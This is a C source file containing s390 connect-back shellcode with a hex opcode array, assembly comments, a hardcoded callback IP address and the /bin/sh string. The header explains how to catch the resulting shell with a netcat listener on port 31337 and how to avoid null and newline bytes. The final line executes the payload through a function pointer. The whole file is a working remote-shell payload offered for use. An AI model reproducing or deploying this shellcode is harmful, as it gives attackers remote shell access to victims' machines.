1 /*----------------------------------------------------------------------*/
\r
2 /* s390 shellcode 0x0a / 0x0 free */
\r
3 /* connectback shell, use netcat listener from caller : nc -l -p 31337 */
\r
4 /* ATTENTION ! altough the code is 0x0a and 0x0 free it may be the case */
\r
5 /* that u wanna connect an ip like : 10.65.120.22 ( in our example ! ) */
\r
6 /* our 192.168.0.1 ! in these cases u have 0xa and 0x0 in your address */
\r
7 /* and u should conside to add some selfmodifing code where u patch the */
\r
8 /* ip address values on the fly, like i did with the svc calls */
\r
9 /* code jcyberpunk@thehackerschoice.com */
\r
10 /*----------------------------------------------------------------------*/
\r
12 "\x0d\x10" /* basr %r1,%r0 */
\r
13 "\x41\x90\x10\xa8" /* la %r9,168(%r1) */
\r
14 "\xa7\x68\x04\x56" /* lhi %r6,1110 */
\r
15 "\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
\r
16 "\x1a\x6a" /* ar %r6,%r10 */
\r
17 "\x42\x60\x10\xa8" /* stc %r6,168(%r1) */
\r
18 "\xa7\x28\x04\x4e" /* lhi %r2,1102 */
\r
19 "\x1a\x2a" /* ar %r2,%r10 */
\r
20 "\x40\x20\xf0\x78" /* sth %r2,120(%r15) */
\r
21 "\xa7\x38\x7a\x69" /* lhi %r3,31337 */
\r
22 "\x40\x30\xf0\x7a" /* sth %r3,122(%r15) */
\r
23 "\x58\x40\x10\xac" /* l %r4,172(%r1) */
\r
24 "\x50\x40\xf0\x7c" /* st %r4,124(%r15) */
\r
25 "\x17\x44" /* xr %r4,%r4 */
\r
26 "\xa7\x38\x04\x4d" /* lhi %r3,1101 */
\r
27 "\x1a\x3a" /* ar %r3,%r10 */
\r
28 "\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
\r
29 "\xa7\x28\x04\x4d" /* lhi %r2,1101 */
\r
30 "\x1a\x2a" /* ar %r2,%r10 */
\r
31 "\x41\x30\xf0\x80" /* la %r3,128(%r15) */
\r
32 "\x0d\xe9" /* basr %r14,%r9 */
\r
33 "\x18\x72" /* lr %r7,%r2 */
\r
34 "\x41\x30\xf0\x78" /* la %r3,120(%r15) */
\r
35 "\xa7\x88\x04\x5c" /* lhi %r8,1116 */
\r
36 "\x1a\x8a" /* ar %r8,%r10 */
\r
37 "\x18\x48" /* lr %r4,%r8 */
\r
38 "\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
\r
39 "\xa7\x28\x04\x4f" /* lhi %r2,1103 */
\r
40 "\x1a\x2a" /* ar %r2,%r10 */
\r
41 "\x41\x30\xf0\x80" /* la %r3,128(%r15) */
\r
42 "\x0d\xe9" /* basr %r14,%r9 */
\r
43 "\x18\x27" /* lr %r2,%r7 */
\r
44 "\xa7\x68\x04\x8b" /* lhi %r6,1163 */
\r
45 "\x1a\x6a" /* ar %r6,%r10 */
\r
46 "\x42\x60\x10\xa9" /* stc %r6,169(%r1) */
\r
47 "\xa7\x38\x04\x4e" /* lhi %r3,1102 */
\r
48 "\x1a\x3a" /* ar %r3,%r10 */
\r
49 "\x0d\xe9" /* basr %r14,%r9 */
\r
50 "\xa7\x3a\xff\xff" /* ahi %r3,-1 */
\r
51 "\x0d\xe9" /* basr %r14,%r9 */
\r
52 "\xa7\x3a\xff\xff" /* ahi %r3,-1 */
\r
53 "\x0d\xe9" /* basr %r14,%r9 */
\r
54 "\xa7\x68\x04\x57" /* lhi %r6,1111 */
\r
55 "\x1a\x6a" /* ar %r6,%r10 */
\r
56 "\x42\x60\x10\xa9" /* stc %r6,169(%r1) */
\r
57 "\x41\x20\x10\xb0" /* la %r2,176(%r1) */
\r
58 "\x50\x20\x10\xb8" /* st %r2,184(%r1) */
\r
59 "\x41\x30\x10\xb8" /* la %r3,184(%r1) */
\r
60 "\x17\x44" /* xr %r4,%r4 */
\r
61 "\x42\x40\x10\xb7" /* stc %r4,183(%r1) */
\r
62 "\x50\x40\x10\xbc" /* st %r4,188(%r1) */
\r
63 "\x41\x40\x10\xbc" /* la %r4,188(%r1) */
\r
64 "\x0d\xe9" /* basr %r14,%r9 */
\r
65 "\x0b\x66" /* svc 102 <--- after modification */
\r
66 "\x07\xfe" /* br %r14 */
\r
67 "\x0a\x41\x78\x16" /* ip-address to connect back */
\r
68 "\x2f\x62\x69\x6e" /* /bin */
\r
69 "\x2f\x73\x68\x5c"; /* /sh\\ */
\r
73 void (*z)()=(void*)shellcode;
\r